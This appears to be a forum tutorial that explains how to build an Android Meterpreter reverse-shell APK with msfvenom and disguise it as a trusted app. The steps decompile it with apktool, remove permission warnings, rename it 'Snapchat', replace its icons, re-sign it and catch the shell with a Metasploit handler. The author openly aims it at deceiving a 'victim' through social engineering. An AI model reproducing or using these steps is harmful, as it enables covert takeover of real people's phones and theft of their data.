Well hello dear readers of Null byte,
let me start off stating english is not my first language and they will be some grammar mistakes. This also is my first tutorial so don't hesitate to give me feedback :)
You may have made a malicious apk (android package) before on kali, it is done the same way you make a malicious exe. Done by msfvenom.
In this short tutorial I will show you how to change the icon, permissions, and name of the app, to make it more convincing for your victim. Something which can be very relevant when you are Social Engineering someone.
Step 1: Making the Malicious Apk
So, lets start off by making our meterpreter apk. Enter this code in the terminal
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk
This will create app.apk in your current folder.
Now comes the hard part.
Step 2: Installing Apktool
You will need to install Apktool on your system, I used windows for this, but it should be done the same way on linux/mac os. Since this is different for everybody I won't cover installing this tool. Check out their website for your system.
Do note that Apktool is installed by default in the reverse engineering toolkit from Kali linux!
Step 3: Decompiling Your Apk
First check if you can run apktool properly by running the command:
apktool
If you get the help menu, everything is installed correctly. Now run the command
apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder
apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files. Most likly:
- The 'res' folder
- The AndroidManifest.xml file
- The 'smali' folder
- The 'orginal' folder
- The apktool.yml file
Step 4: Modifying the Files
For this tutorial we are only going to modify the AndroidManifest.xml file and the 'res' folder. First off, open the AndroidManifest.xml with your preffered text editor. I am using Notepad++.
You will see something like this:
First off, lets delete a few lines we will probably not need and will give the user an extra warning.
Since nullbyte messes with symbols here is a pastebin with what to do
You're back? Great.
Now we are going into the 'res' folder. Here you will find 'values' folder, go into it. Now you will find 2 files, 1 named strings.xml, once again, open this xml file with your preffered text editor.
You will find the line
Change '''MainActivity'' to you prefferd app name, I chose the name '''Snapchat''. But choose a name which you seem fit for your situation.
Save the file and go back up to the /res/ folder.
Create 3 folders named:
- drawable-ldpi-v4
- drawable-mdpi-v4
- drawable-hdpi-v4
You will need now to find an appropriate icon set for your app.
I used the website's Android Asset Studio and resizeimage.net
The goal is to get 3 png files of the following sizes:
- 36x36 (pixels) for the ldpi folder
- 48x48 for the mdpi folder
- 72x72 for the hdpi folder
Name these png files all 'icon.png' and place them in the appropriate folder.
Step 5: Compiling Your App
This process is very straight forward. Go back to the apktool terminal and enter the following command:
apktool b /pathtoyourfolder/folder
This will create an apk in the newly created 'dist' folder (found in apktool b /pathtoyourfolder/folder)
You thought we were done? Almost, just one more step.
Step 6: Signing the Apk
I here is a zip used for signing Original thread direct link or if that doesn't work this mega.co.nz link. Unzip the file and cd into the new folder, now use the command:
java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk
This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon.
Step 7: Listing for the Connection
Now the final part,
open up metasploit using:
msfconsole
Open multi/handler
use multi/handler
set the payload
set payload
android/meterpreter/reversetcp
set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)
and exploit
exploit
Now once the open up the app, you will get an incoming meterpreter shell, sweet right?
I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.
-Bart
Comments
No Comments Exist
Be the first, drop a comment!